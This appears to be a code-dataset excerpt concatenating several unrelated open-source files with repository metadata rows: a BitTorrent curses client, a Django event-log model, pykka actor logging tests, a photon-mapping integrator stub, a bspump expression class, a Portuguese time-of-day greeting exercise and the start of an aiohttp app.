"Windows port of Python. It is however available for the Cygwin "
"port of Python, running on all Win32 systems (www.cygwin.com).")
print
print _('You may still use "bittorrent-console" to download.')
sys.exit(1)
def fmttime(n):
if n == 0:
return _("download complete!")
try:
n = int(n)
assert n >= 0 and n < 5184000 # 60 days
except:
return _("<unknown>")
m, s = divmod(n, 60)
h, m = divmod(m, 60)
return _("finishing in %d:%02d:%02d") % (h, m, s)
def fmtsize(n):
s = str(n)
size = s[-3:]
while len(s) > 3:
s = s[:-3]
size = '%s,%s' % (s[-3:], size)
if n > 999:
unit = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB']
i = 1
while i + 1 < len(unit) and (n >> 10) >= 999:
i += 1
n >>= 10
n /= (1 << 10)
size = '%s (%.0f %s)' % (size, n, unit[i])
return size
class CursesDisplayer(object):
def __init__(self, scrwin, errlist, doneflag, reread_config, ulrate):
self.scrwin = scrwin
self.errlist = errlist
self.doneflag = doneflag
signal(SIGWINCH, self.winch_handler)
self.changeflag = threading.Event()
self.done = False
self.reread_config = reread_config
self.ulrate = ulrate
self.activity = ''
self.status = ''
self.progress = ''
self.downRate = '---'
self.upRate = '---'
self.shareRating = ''
self.seedStatus = ''
self.peerStatus = ''
self.errors = []
self.file = ''
self.downloadTo = ''
self.fileSize = ''
self.numpieces = 0
self.spew_scroll_time = 0
self.spew_scroll_pos = 0
self._remake_window()
curses.use_default_colors()
def set_torrent_values(self, name, path, size, numpieces):
self.file = name
self.downloadTo = path
self.fileSize = fmtsize(size)
self.numpieces = numpieces
self._remake_window()
def winch_handler(self, signum, stackframe):
self.changeflag.set()
curses.endwin()
self.scrwin.refresh()
self.scrwin = curses.newwin(0, 0, 0, 0)
self._remake_window()
def _remake_window(self):
self.scrh, self.scrw = self.scrwin.getmaxyx()
self.scrpan = curses.panel.new_panel(self.scrwin)
self.labelh, self.labelw, self.labely, self.labelx = 11, 9, 1, 2
self.labelwin = curses.newwin(self.labelh, self.labelw,
self.labely, self.labelx)
self.labelpan = curses.panel.new_panel(self.labelwin)
self.fieldh, self.fieldw, self.fieldy, self.fieldx = (
self.labelh, self.scrw-2 - self.labelw-3,
1, self.labelw+3)
self.fieldwin = curses.newwin(self.fieldh, self.fieldw,
self.fieldy, self.fieldx)
self.fieldwin.nodelay(1)
self.fieldpan = curses.panel.new_panel(self.fieldwin)
self.spewh, self.speww, self.spewy, self.spewx = (
self.scrh - self.labelh - 2, self.scrw - 3, 1 + self.labelh, 2)
self.spewwin = curses.newwin(self.spewh, self.speww,
self.spewy, self.spewx)
self.spewpan = curses.panel.new_panel(self.spewwin)
try:
self.scrwin.border(ord('|'),ord('|'),ord('-'),ord('-'),ord(' '),ord(' '),ord(' '),ord(' '))
except:
pass
self.labelwin.addstr(0, 0, _("file:"))
self.labelwin.addstr(1, 0, _("size:"))
self.labelwin.addstr(2, 0, _("dest:"))
self.labelwin.addstr(3, 0, _("progress:"))
self.labelwin.addstr(4, 0, _("status:"))
self.labelwin.addstr(5, 0, _("dl speed:"))
self.labelwin.addstr(6, 0, _("ul speed:"))
self.labelwin.addstr(7, 0, _("sharing:"))
self.labelwin.addstr(8, 0, _("seeds:"))
self.labelwin.addstr(9, 0, _("peers:"))
curses.panel.update_panels()
curses.doupdate()
self.changeflag.clear()
def finished(self):
self.done = True
self.downRate = '---'
self.display({'activity':_("download succeeded"), 'fractionDone':1})
def error(self, errormsg):
newerrmsg = strftime('[%H:%M:%S] ') + errormsg
self.errors.append(newerrmsg.split('\n')[0])
self.errlist.append(newerrmsg)
self.display({})
def display(self, statistics):
fractionDone = statistics.get('fractionDone')
activity = statistics.get('activity')
timeEst = statistics.get('timeEst')
downRate = statistics.get('downRate')
upRate = statistics.get('upRate')
spew = statistics.get('spew')
inchar = self.fieldwin.getch()
if inchar == 12: # ^L
self._remake_window()
elif inchar in (ord('q'),ord('Q')):
self.doneflag.set()
elif inchar in (ord('r'),ord('R')):
self.reread_config()
elif inchar in (ord('u'),ord('U')):
curses.echo()
self.fieldwin.nodelay(0)
s = self.fieldwin.getstr(6,10)
curses.noecho()
self.fieldwin.nodelay(1)
r = None
try:
r = int(s)
except ValueError:
pass
if r is not None:
self.ulrate(r)
if timeEst is not None:
self.activity = fmttime(timeEst)
elif activity is not None:
self.activity = activity
if self.changeflag.isSet():
return
if fractionDone is not None:
blocknum = int(self.fieldw * fractionDone)
self.progress = blocknum * '#' + (self.fieldw - blocknum) * '_'
self.status = '%s (%.1f%%)' % (self.activity, fractionDone * 100)
if downRate is not None:
self.downRate = '%.1f KB/s' % (downRate / (1 << 10))
if upRate is not None:
self.upRate = '%.1f KB/s' % (upRate / (1 << 10))
downTotal = statistics.get('downTotal')
if downTotal is not None:
upTotal = statistics['upTotal']
if downTotal <= upTotal / 100:
self.shareRating = _("oo (%.1f MB up / %.1f MB down)") % (
upTotal / (1<<20), downTotal / (1<<20))
else:
self.shareRating = _("%.3f (%.1f MB up / %.1f MB down)") % (
upTotal / downTotal, upTotal / (1<<20), downTotal / (1<<20))
numCopies = statistics['numCopies']
nextCopies = ', '.join(["%d:%.1f%%" % (a,int(b*1000)/10) for a,b in
zip(xrange(numCopies+1, 1000), statistics['numCopyList'])])
if not self.done:
self.seedStatus = _("%d seen now, plus %d distributed copies"
"(%s)") % (statistics['numSeeds' ],
statistics['numCopies'],
nextCopies)
else:
self.seedStatus = _("%d distributed copies (next: %s)") % (
statistics['numCopies'], nextCopies)
self.peerStatus = _("%d seen now") % statistics['numPeers']
self.fieldwin.erase()
self.fieldwin.addnstr(0, 0, self.file, self.fieldw, curses.A_BOLD)
self.fieldwin.addnstr(1, 0, self.fileSize, self.fieldw)
self.fieldwin.addnstr(2, 0, self.downloadTo, self.fieldw)
if self.progress:
self.fieldwin.addnstr(3, 0, self.progress, self.fieldw, curses.A_BOLD)
self.fieldwin.addnstr(4, 0, self.status, self.fieldw)
self.fieldwin.addnstr(5, 0, self.downRate, self.fieldw)
self.fieldwin.addnstr(6, 0, self.upRate, self.fieldw)
self.fieldwin.addnstr(7, 0, self.shareRating, self.fieldw)
self.fieldwin.addnstr(8, 0, self.seedStatus, self.fieldw)
self.fieldwin.addnstr(9, 0, self.peerStatus, self.fieldw)
self.spewwin.erase()
if not spew:
errsize = self.spewh
if self.errors:
self.spewwin.addnstr(0, 0, _("error(s):"), self.speww, curses.A_BOLD)
errsize = len(self.errors)
displaysize = min(errsize, self.spewh)
displaytop = errsize - displaysize
for i in range(displaysize):
self.spewwin.addnstr(i, self.labelw, self.errors[displaytop + i],
self.speww-self.labelw-1, curses.A_BOLD)
else:
if self.errors:
self.spewwin.addnstr(0, 0, _("error:"), self.speww, curses.A_BOLD)
self.spewwin.addnstr(0, self.labelw, self.errors[-1],
self.speww-self.labelw-1, curses.A_BOLD)
self.spewwin.addnstr(2, 0, _(" # IP Upload Download Completed Speed"), self.speww, curses.A_BOLD)
if self.spew_scroll_time + SPEW_SCROLL_RATE < time():
self.spew_scroll_time = time()
if len(spew) > self.spewh-5 or self.spew_scroll_pos > 0:
self.spew_scroll_pos += 1
if self.spew_scroll_pos > len(spew):
self.spew_scroll_pos = 0
for i in range(len(spew)):
spew[i]['lineno'] = i+1
spew.append({'lineno': None})
spew = spew[self.spew_scroll_pos:] + spew[:self.spew_scroll_pos]
for i in range(min(self.spewh - 5, len(spew))):
if not spew[i]['lineno']:
continue
self.spewwin.addnstr(i+3, 0, '%3d' % spew[i]['lineno'], 3)
self.spewwin.addnstr(i+3, 4, spew[i]['ip'], 15)
ul = spew[i]['upload']
if ul[1] > 100:
self.spewwin.addnstr(i+3, 20, '%6.0f KB/s' % (
ul[1] / 1000), 11)
self.spewwin.addnstr(i+3, 32, '-----', 5)
if ul[2]:
self.spewwin.addnstr(i+3, 33, 'I', 1)
if ul[3]:
self.spewwin.addnstr(i+3, 35, 'C', 1)
dl = spew[i]['download']
if dl[1] > 100:
self.spewwin.addnstr(i+3, 38, '%6.0f KB/s' % (
dl[1] / 1000), 11)
self.spewwin.addnstr(i+3, 50, '-------', 7)
if dl[2]:
self.spewwin.addnstr(i+3, 51, 'I', 1)
if dl[3]:
self.spewwin.addnstr(i+3, 53, 'C', 1)
if dl[4]:
self.spewwin.addnstr(i+3, 55, 'S', 1)
self.spewwin.addnstr(i+3, 58, '%5.1f%%' % (int(spew[i]['completed']*1000)/10), 6)
if spew[i]['speed'] is not None:
self.spewwin.addnstr(i+3, 64, '%5.0f KB/s' % (spew[i]['speed']/1000), 10)
self.spewwin.addnstr(self.spewh-1, 0,
_("downloading %d pieces, have %d fragments, "
"%d of %d pieces completed") %
(statistics['storage_active'], statistics['storage_dirty'],
statistics['storage_numcomplete'], self.numpieces),
self.speww-1)
curses.panel.update_panels()
curses.doupdate()
class DL(Feedback):
def __init__(self, metainfo, config, errlist):
self.doneflag = threading.Event()
self.metainfo = metainfo
self.config = Preferences().initWithDict(config)
self.errlist = errlist
def run(self, scrwin):
def reread():
self.multitorrent.rawserver.external_add_task(self.reread_config,0)
def ulrate(value):
self.multitorrent.set_option('max_upload_rate', value)
self.torrent.set_option('max_upload_rate', value)
self.d = CursesDisplayer(scrwin, self.errlist, self.doneflag, reread, ulrate)
try:
self.multitorrent = Multitorrent(self.config, self.doneflag,
self.global_error)
# raises BTFailure if bad
metainfo = ConvertedMetainfo(bdecode(self.metainfo))
torrent_name = metainfo.name_fs
if config['save_as']:
if config['save_in']:
raise BTFailure(_("You cannot specify both --save_as and "
"--save_in"))
saveas = config['save_as']
elif config['save_in']:
saveas = os.path.join(config['save_in'], torrent_name)
else:
saveas = torrent_name
self.d.set_torrent_values(metainfo.name, os.path.abspath(saveas),
metainfo.total_bytes, len(metainfo.hashes))
self.torrent = self.multitorrent.start_torrent(metainfo,
Preferences(self.config), self, saveas)
except BTFailure, e:
errlist.append(str(e))
return
self.get_status()
self.multitorrent.rawserver.install_sigint_handler()
self.multitorrent.rawserver.listen_forever()
self.d.display({'activity':_("shutting down"), 'fractionDone':0})
self.torrent.shutdown()
def reread_config(self):
try:
newvalues = configfile.get_config(self.config, 'bittorrent-curses')
except Exception, e:
self.d.error(_("Error reading config: ") + str(e))
return
self.config.update(newvalues)
# The set_option call can potentially trigger something that kills
# the torrent (when writing this the only possibility is a change in
# max_files_open causing an IOError while closing files), and so
# the self.failed() callback can run during this loop.
for option, value in newvalues.iteritems():
self.multitorrent.set_option(option, value)
for option, value in newvalues.iteritems():
self.torrent.set_option(option, value)
def get_status(self):
self.multitorrent.rawserver.add_task(self.get_status,
self.config['display_interval'])
status = self.torrent.get_status(self.config['spew'])
self.d.display(status)
def global_error(self, level, text):
self.d.error(text)
def error(self, torrent, level, text):
self.d.error(text)
def failed(self, torrent, is_external):
self.doneflag.set()
def finished(self, torrent):
self.d.finished()
if __name__ == '__main__':
uiname = 'bittorrent-curses'
defaults = get_defaults(uiname)
metainfo = None
if len(sys.argv) <= 1:
printHelp(uiname, defaults)
sys.exit(1)
try:
config, args = configfile.parse_configuration_and_args(defaults,
uiname, sys.argv[1:], 0, 1)
torrentfile = None
if len(args):
torrentfile = args[0]
for opt in ('responsefile', 'url'):
if config[opt]:
print '"--%s"' % opt, _("deprecated, do not use")
torrentfile = config[opt]
if torrentfile is not None:
metainfo, errors = GetTorrent.get(torrentfile)
if errors:
raise BTFailure(_("Error reading .torrent file: ") + '\n'.join(errors))
else:
raise BTFailure(_("you must specify a .torrent file"))
except BTFailure, e:
print str(e)
sys.exit(1)
errlist = []
dl = DL(metainfo, config, errlist)
curses_wrapper(dl.run)
if errlist:
print _("These errors occurred during execution:")
for error in errlist:
print error
| 38.988914 | 145 | 0.556187 | 13,656 | 0.776615 | 0 | 0 | 0 | 0 | 0 | 0 | 2,816 | 0.160146 |
a4de856ef997ed99088a6be0601cf0f3605b3a54 | 5,551 | py | Python | event_log/models/entry.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 13 | 2015-11-29T12:19:12.000Z | 2021-02-21T15:42:11.000Z | event_log/models/entry.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 23 | 2015-04-29T19:43:34.000Z | 2021-02-10T05:50:17.000Z | event_log/models/entry.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 11 | 2015-09-20T18:59:00.000Z | 2020-02-07T08:47:34.000Z | from django.conf import settings
from django.contrib.postgres.fields import JSONField
from django.db import models
from django.db.models import Q
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
TARGET_FKEY_ATTRS = dict(
null=True,
blank=True,
on_delete=models.SET_NULL,
)
class Entry(models.Model):
created_at = models.DateTimeField(auto_now_add=True, db_index=True)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.SET_NULL,
null=True,
blank=True,
)
entry_type = models.CharField(max_length=255)
context = models.CharField(
max_length=1024,
blank=True,
default='',
verbose_name=_('Context'),
help_text=_('The URL of the view in which the event occurred.'),
)
ip_address = models.CharField(
max_length=48,
blank=True,
default='',
verbose_name=_('IP address'),
help_text=_('The IP address this action was performed from.'),
)
# various target fkeys, sparse
event = models.ForeignKey('core.Event', **TARGET_FKEY_ATTRS)
person = models.ForeignKey('core.Person', **TARGET_FKEY_ATTRS)
organization = models.ForeignKey('core.Organization', **TARGET_FKEY_ATTRS)
feedback_message = models.ForeignKey('feedback.FeedbackMessage', **TARGET_FKEY_ATTRS)
event_survey_result = models.ForeignKey('surveys.EventSurveyResult', **TARGET_FKEY_ATTRS)
global_survey_result = models.ForeignKey('surveys.GlobalSurveyResult', **TARGET_FKEY_ATTRS)
search_term = models.CharField(max_length=255, blank=True, default='')
# we should probably have shoved them in a jsonfield in the first place
other_fields = JSONField(blank=True, default=dict)
@property
def survey_result(self):
"""
Shortcut for templates etc. that apply to both GlobalSurveyResults and EventSurveyResults.
"""
return self.event_survey_result if self.event_survey_result else self.global_survey_result
@property
def cbac_claims(self):
return ", ".join(f"{key}={value}" for (key, value) in self.other_fields.get("claims", {}).items())
@property
def signup(self):
from labour.models import Signup
if not self.event or not self.person:
return None
try:
return Signup.objects.get(event=self.event, person=self.person)
except Signup.DoesNotExist:
return None
def send_updates(self):
from .subscription import Subscription
q = Q(entry_type=self.entry_type, active=True)
# TODO need a more flexible filter solution that does not hard-code these
# One option would be to specify filter = JSONField in Subscription.
# Implementing this filter would require a client-side check or one SQL query
# per Subscription, however, as we query Subscriptions by Entry and not vice versa.
if self.event:
# Implement the event filter. Subscriptions without event_filter receive updates from
# all events. Subscriptions with event_filter receive only updates from that event.
q &= Q(event_filter=self.event) | Q(event_filter__isnull=True)
if self.event_survey_result:
# Implement event survey filter.
survey = self.event_survey_result.survey
q &= Q(event_survey_filter=survey) | Q(event_survey_filter__isnull=True)
if self.event and self.person:
# Implement job category filter
from labour.models import Signup
try:
signup = Signup.objects.get(event=self.event, person=self.person)
except Signup.DoesNotExist:
pass
else:
q &= (
Q(job_category_filter__in=signup.job_categories.all()) |
Q(job_category_filter__in=signup.job_categories_accepted.all()) |
Q(job_category_filter__isnull=True)
)
for subscription in Subscription.objects.filter(q):
subscription.send_update_for_entry(self)
@property
def entry_type_metadata(self):
if not hasattr(self, '_entry_type_metadata'):
from .. import registry
self._entry_type_metadata = registry.get(self.entry_type)
return self._entry_type_metadata
@property
def email_reply_to(self):
meta = self.entry_type_metadata
if callable(meta.email_reply_to):
return meta.email_reply_to(self)
else:
return meta.email_reply_to
@property
def message(self):
meta = self.entry_type_metadata
if callable(meta.message):
return meta.message(self)
else:
return meta.message.format(entry=self)
@property
def email_subject(self):
return '[{app_name}] {message}'.format(
app_name=settings.KOMPASSI_INSTALLATION_NAME,
message=self.message,
)
@property
def email_body(self):
meta = self.entry_type_metadata
if callable(meta.email_body_template):
return meta.email_body_template(self)
else:
return render_to_string(meta.email_body_template, dict(
entry=self,
settings=settings,
))
class Meta:
verbose_name = _('log entry')
verbose_name_plural = _('log entries')
ordering = ('-created_at',)
| 34.265432 | 106 | 0.652135 | 5,202 | 0.937128 | 0 | 0 | 1,894 | 0.3412 | 0 | 0 | 1,108 | 0.199604 |
a4df32bb4d4e2f16c17a67995348e36cb2171d81 | 7,202 | py | Python | tests/logging_test.py | lykme516/pykka | d66b0c49658fc0e7c4e1ae46a0f9c50c7e964ca5 | [
"Apache-2.0"
] | 1 | 2021-01-03T09:25:23.000Z | 2021-01-03T09:25:23.000Z | tests/logging_test.py | hujunxianligong/pykka | d66b0c49658fc0e7c4e1ae46a0f9c50c7e964ca5 | [
"Apache-2.0"
] | null | null | null | tests/logging_test.py | hujunxianligong/pykka | d66b0c49658fc0e7c4e1ae46a0f9c50c7e964ca5 | [
"Apache-2.0"
] | null | null | null | import logging
import threading
import unittest
from pykka import ActorRegistry, ThreadingActor
from tests import TestLogHandler
from tests.actor_test import (
EarlyFailingActor, FailingOnFailureActor, LateFailingActor)
class LoggingNullHandlerTest(unittest.TestCase):
def test_null_handler_is_added_to_avoid_warnings(self):
logger = logging.getLogger('pykka')
handler_names = [h.__class__.__name__ for h in logger.handlers]
self.assertTrue('NullHandler' in handler_names)
class ActorLoggingTest(object):
def setUp(self):
self.on_stop_was_called = self.event_class()
self.on_failure_was_called = self.event_class()
self.actor_ref = self.AnActor.start(
self.on_stop_was_called, self.on_failure_was_called)
self.actor_proxy = self.actor_ref.proxy()
self.log_handler = TestLogHandler(logging.DEBUG)
self.root_logger = logging.getLogger()
self.root_logger.addHandler(self.log_handler)
def tearDown(self):
self.log_handler.close()
ActorRegistry.stop_all()
def test_unexpected_messages_are_logged(self):
self.actor_ref.ask({'unhandled': 'message'})
self.log_handler.wait_for_message('warning')
with self.log_handler.lock:
self.assertEqual(1, len(self.log_handler.messages['warning']))
log_record = self.log_handler.messages['warning'][0]
self.assertEqual(
'Unexpected message received by %s' % self.actor_ref,
log_record.getMessage().split(': ')[0])
def test_exception_is_logged_when_returned_to_caller(self):
try:
self.actor_proxy.raise_exception().get()
self.fail('Should raise exception')
except Exception:
pass
self.log_handler.wait_for_message('debug')
with self.log_handler.lock:
self.assertEqual(1, len(self.log_handler.messages['debug']))
log_record = self.log_handler.messages['debug'][0]
self.assertEqual(
'Exception returned from %s to caller:' % self.actor_ref,
log_record.getMessage())
self.assertEqual(Exception, log_record.exc_info[0])
self.assertEqual('foo', str(log_record.exc_info[1]))
def test_exception_is_logged_when_not_reply_requested(self):
self.on_failure_was_called.clear()
self.actor_ref.tell({'command': 'raise exception'})
self.on_failure_was_called.wait(5)
self.assertTrue(self.on_failure_was_called.is_set())
self.log_handler.wait_for_message('error')
with self.log_handler.lock:
self.assertEqual(1, len(self.log_handler.messages['error']))
log_record = self.log_handler.messages['error'][0]
self.assertEqual(
'Unhandled exception in %s:' % self.actor_ref,
log_record.getMessage())
self.assertEqual(Exception, log_record.exc_info[0])
self.assertEqual('foo', str(log_record.exc_info[1]))
def test_base_exception_is_logged(self):
self.log_handler.reset()
self.on_stop_was_called.clear()
self.actor_ref.tell({'command': 'raise base exception'})
self.on_stop_was_called.wait(5)
self.assertTrue(self.on_stop_was_called.is_set())
self.log_handler.wait_for_message('debug', num_messages=3)
with self.log_handler.lock:
self.assertEqual(3, len(self.log_handler.messages['debug']))
log_record = self.log_handler.messages['debug'][0]
self.assertEqual(
'BaseException() in %s. Stopping all actors.' % self.actor_ref,
log_record.getMessage())
def test_exception_in_on_start_is_logged(self):
self.log_handler.reset()
start_event = self.event_class()
actor_ref = self.EarlyFailingActor.start(start_event)
start_event.wait(5)
self.log_handler.wait_for_message('error')
with self.log_handler.lock:
self.assertEqual(1, len(self.log_handler.messages['error']))
log_record = self.log_handler.messages['error'][0]
self.assertEqual(
'Unhandled exception in %s:' % actor_ref,
log_record.getMessage())
def test_exception_in_on_stop_is_logged(self):
self.log_handler.reset()
stop_event = self.event_class()
actor_ref = self.LateFailingActor.start(stop_event)
stop_event.wait(5)
self.log_handler.wait_for_message('error')
with self.log_handler.lock:
self.assertEqual(1, len(self.log_handler.messages['error']))
log_record = self.log_handler.messages['error'][0]
self.assertEqual(
'Unhandled exception in %s:' % actor_ref,
log_record.getMessage())
def test_exception_in_on_failure_is_logged(self):
self.log_handler.reset()
failure_event = self.event_class()
actor_ref = self.FailingOnFailureActor.start(failure_event)
actor_ref.tell({'command': 'raise exception'})
failure_event.wait(5)
self.log_handler.wait_for_message('error', num_messages=2)
with self.log_handler.lock:
self.assertEqual(2, len(self.log_handler.messages['error']))
log_record = self.log_handler.messages['error'][0]
self.assertEqual(
'Unhandled exception in %s:' % actor_ref,
log_record.getMessage())
class AnActor(object):
def __init__(self, on_stop_was_called, on_failure_was_called):
super(AnActor, self).__init__()
self.on_stop_was_called = on_stop_was_called
self.on_failure_was_called = on_failure_was_called
def on_stop(self):
self.on_stop_was_called.set()
def on_failure(self, exception_type, exception_value, traceback):
self.on_failure_was_called.set()
def on_receive(self, message):
if message.get('command') == 'raise exception':
return self.raise_exception()
elif message.get('command') == 'raise base exception':
raise BaseException()
else:
super(AnActor, self).on_receive(message)
def raise_exception(self):
raise Exception('foo')
def ConcreteActorLoggingTest(actor_class, event_class):
class C(ActorLoggingTest, unittest.TestCase):
class AnActor(AnActor, actor_class):
pass
class EarlyFailingActor(EarlyFailingActor, actor_class):
pass
class LateFailingActor(LateFailingActor, actor_class):
pass
class FailingOnFailureActor(FailingOnFailureActor, actor_class):
pass
C.event_class = event_class
C.__name__ = '%sLoggingTest' % actor_class.__name__
return C
ThreadingActorLoggingTest = ConcreteActorLoggingTest(
ThreadingActor, threading.Event)
try:
import gevent.event
from pykka.gevent import GeventActor
GeventActorLoggingTest = ConcreteActorLoggingTest(
GeventActor, gevent.event.Event)
except ImportError:
pass
try:
from pykka.eventlet import EventletActor, EventletEvent
EventletActorLoggingTest = ConcreteActorLoggingTest(
EventletActor, EventletEvent)
except ImportError:
pass
| 36.01 | 75 | 0.67509 | 6,319 | 0.877395 | 0 | 0 | 0 | 0 | 0 | 0 | 622 | 0.086365 |
a4e00d2cb49985d38fa9a42e89c6babd42a14602 | 190 | py | Python | ldaptor/apps/webui/i18n.py | tv42/ldaptor | 3f227602c8c021b9e943136a2dc8d7db44a11e50 | [
"MIT"
] | 1 | 2015-11-25T04:01:26.000Z | 2015-11-25T04:01:26.000Z | ldaptor/apps/webui/i18n.py | tv42/ldaptor | 3f227602c8c021b9e943136a2dc8d7db44a11e50 | [
"MIT"
] | null | null | null | ldaptor/apps/webui/i18n.py | tv42/ldaptor | 3f227602c8c021b9e943136a2dc8d7db44a11e50 | [
"MIT"
] | 2 | 2019-11-06T02:14:10.000Z | 2022-01-10T08:34:11.000Z | from nevow.inevow import ILanguages
from nevow.i18n import I18NConfig
from nevow import i18n
_ = i18n.Translator(domain='ldaptor-webui')
def render():
return i18n.render(translator=_)
| 21.111111 | 43 | 0.778947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.078947 |
a4e1d55175b32d5385828a34b15cc230ebdc6f9d | 2,026 | py | Python | surface_integrator/photonmap.py | neodyme60/raypy | a898ba46e07ba299fcb1729dca45abdc1e944f83 | [
"MIT"
] | 1 | 2018-05-15T04:00:17.000Z | 2018-05-15T04:00:17.000Z | surface_integrator/photonmap.py | neodyme60/raypy | a898ba46e07ba299fcb1729dca45abdc1e944f83 | [
"MIT"
] | null | null | null | surface_integrator/photonmap.py | neodyme60/raypy | a898ba46e07ba299fcb1729dca45abdc1e944f83 | [
"MIT"
] | null | null | null | import math
from scipy.spatial.ckdtree import cKDTree
from core.camera import Camera
from core.intersection import Intersection
from core.ray import Ray
from core.renderer import Renderer
from core.sample import Sample
from core.sampler import Sampler
from core.scene import Scene
from core.spectrum import Spectrum
from core.surface_integrator import SurfaceIntegrator
from maths.point3d import Point3d
from maths.vector3d import Vector3d
class Photon():
def __init__(self, p: Point3d, alpha: Spectrum, wi: Vector3d):
self.p = p
self.alpha = alpha
self.wi = wi
class KdTreePhoton:
def __init__(self):
self.tree = None
# PhotonIntegrator Local Declarations
class PhotonIntegrator(SurfaceIntegrator):
def __init__(self, ncaus: int, nind: int, nl: int, mdepth: int, mphodepth: int, mdist: float, fg: bool, gs: int, ga: float):
super().__init__()
self.nCausticPhotonsWanted = ncaus
self.nIndirectPhotonsWanted = nind
self.nLookup = nl
self.maxSpecularDepth = mdepth
self.maxPhotonDepth = mphodepth
self.maxDistSquared = mdist * mdist
self.finalGather = fg
self.cosGatherAngle = math.cos(math.radians(ga))
self.gatherSamples = gs
self.nCausticPaths = 0
self.nIndirectPaths = 0
self.lightSampleOffsets = None
self.bsdfSampleOffsets = None
self.causticMap = KdTreePhoton()
self.indirectMap = KdTreePhoton()
self.radianceMap = KdTreePhoton()
def Li(self, scene, renderer: Renderer, ray: Ray, intersection: Intersection, sample: Sample) -> Spectrum:
return super().Li(scene, renderer, ray, intersection, sample)
def Preprocess(self, scene: Scene, camera: Camera, renderer: Renderer):
super().Preprocess(scene, camera, renderer)
def RequestSamples(self, sampler: Sampler, sample: Sample, scene: Scene):
super().RequestSamples(sampler, sample, scene)
| 34.338983 | 129 | 0.681145 | 1,514 | 0.747285 | 0 | 0 | 0 | 0 | 0 | 0 | 38 | 0.018756 |
a4e4663d3202bce0ac276499c4caa3af243144cc | 1,831 | py | Python | bspump/declarative/expression/datastructs/itemexpr.py | chinese-soup/BitSwanPump | 6ef71577cc1f166cff80876d28be37c791061bd2 | [
"BSD-3-Clause"
] | 1 | 2020-08-20T12:56:58.000Z | 2020-08-20T12:56:58.000Z | bspump/declarative/expression/datastructs/itemexpr.py | chinese-soup/BitSwanPump | 6ef71577cc1f166cff80876d28be37c791061bd2 | [
"BSD-3-Clause"
] | null | null | null | bspump/declarative/expression/datastructs/itemexpr.py | chinese-soup/BitSwanPump | 6ef71577cc1f166cff80876d28be37c791061bd2 | [
"BSD-3-Clause"
] | null | null | null | from ...abc import Expression, evaluate
from ..value.eventexpr import EVENT
from ..value.eventexpr import KWARGS
from ..value.eventexpr import ARG
from ..value.valueexpr import VALUE
from ..utility.context import CONTEXT
class ITEM(Expression):
"""
Get the item from a dictionary.
There are two forms:
1) Mapping form
!ITEM
with: !EVENT
item: foo
default: 0
2) Scalar form
!ITEM EVENT potatoes
Scalar form has some limitations (e.g no default value) but it is more compact
"""
def __init__(self, app, *, arg_with=None, arg_item=None, arg_default=None, value=None):
super().__init__(app)
if value is not None:
# Scalar value provided
with_, item = value.split(' ', 2)
with_ = with_.upper()
if with_ == 'EVENT':
self.With = EVENT(app, value='')
elif with_ == 'CONTEXT':
self.With = CONTEXT(app, value='')
elif with_ == 'KWARGS':
self.With = KWARGS(app, value='')
elif with_ == 'ARG':
self.With = ARG(app, value='')
else:
raise RuntimeError("Invalid item argument '{}' - must be EVENT, CONTEXT, KWARGS, ARG", format(with_))
self.Item = VALUE(app, value=item)
self.Default = None
else:
self.With = arg_with
self.Item = arg_item
self.Default = arg_default
def __call__(self, context, event, *args, **kwargs):
with_dict = evaluate(self.With, context, event, *args, **kwargs)
item = evaluate(self.Item, context, event, *args, **kwargs)
try:
if '.' in item:
value = with_dict
for i in item.split('.'):
value = value[i]
else:
value = with_dict[item]
except KeyError:
if self.Default is None:
return None
return evaluate(self.Default, context, event, *args, **kwargs)
except IndexError:
if self.Default is None:
return None
return evaluate(self.Default, context, event, *args, **kwargs)
return value
| 23.474359 | 105 | 0.670126 | 1,606 | 0.877116 | 0 | 0 | 0 | 0 | 0 | 0 | 373 | 0.203714 |
a4e4e36e2de9d52f611d5fad94945eb66a5be6ca | 821 | py | Python | aula10/ex2.py | Vanderluizsj/AulasPython | a4732b3fc524cabb673f6dbfd610975935b67916 | [
"MIT"
] | null | null | null | aula10/ex2.py | Vanderluizsj/AulasPython | a4732b3fc524cabb673f6dbfd610975935b67916 | [
"MIT"
] | null | null | null | aula10/ex2.py | Vanderluizsj/AulasPython | a4732b3fc524cabb673f6dbfd610975935b67916 | [
"MIT"
] | null | null | null | """
Faça um programa que pergunte a hora aousuário e, baseando-se na hora descrita,
exiba a saudação apropriada.
"""
x=1
while x!=0:
#Entra no try caso seja digitado um numero inteiro
try:
horas=int(input('Que horas são? '))
if horas>=0 and horas<=11:
print('Bom dia!')
x-=1
elif horas>=12 and horas<=17:
print('Boa tarde!')
x-=1
elif horas>=13 and horas<=23:
print('Boa noite!')
x-=1
#Caso o numero seja superior a 23 ou inferior a 0 entra no else e repete o programa
else:
print("Digite uma hora entre 0 e 23.")
#Entra no except e repete o codigo caso o caracter digitado não seja um numero inteiro
except:
print("Digite apenas o numero correspondente a hora.")
| 31.576923 | 91 | 0.588307 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 470 | 0.568319 |
a4e6cba016dd1e2cdd954469d0530a12f290140c | 4,137 | py | Python | lab07/app.py | mocurin/ITIS | e7e7c2a00c591ccb318fd0aaa93f426f6e2b8a3f | [
"MIT"
] | null | null | null | lab07/app.py | mocurin/ITIS | e7e7c2a00c591ccb318fd0aaa93f426f6e2b8a3f | [
"MIT"
] | null | null | null | lab07/app.py | mocurin/ITIS | e7e7c2a00c591ccb318fd0aaa93f426f6e2b8a3f | [
"MIT"
] | null | null | null | import aiohttp_jinja2
import jinja2
import secrets
import random
from aiohttp import web
from aiohttp.client import MultiDict
from source import fit_model, vectorize, model_predict
routes = web.RouteTableDef()
PORT = 8080
base_url = f"http://localhost:{PORT}"
IMGS, X, Y = 3, 5, 7
THRESH = 0.1
networks = {}
@routes.get('/')
async def setup(request: web.Request):
raise web.HTTPFound(location=f"{base_url}/fit/{IMGS}:{X}-{Y}")
@routes.get('/fit/{imgs}:{x}-{y}')
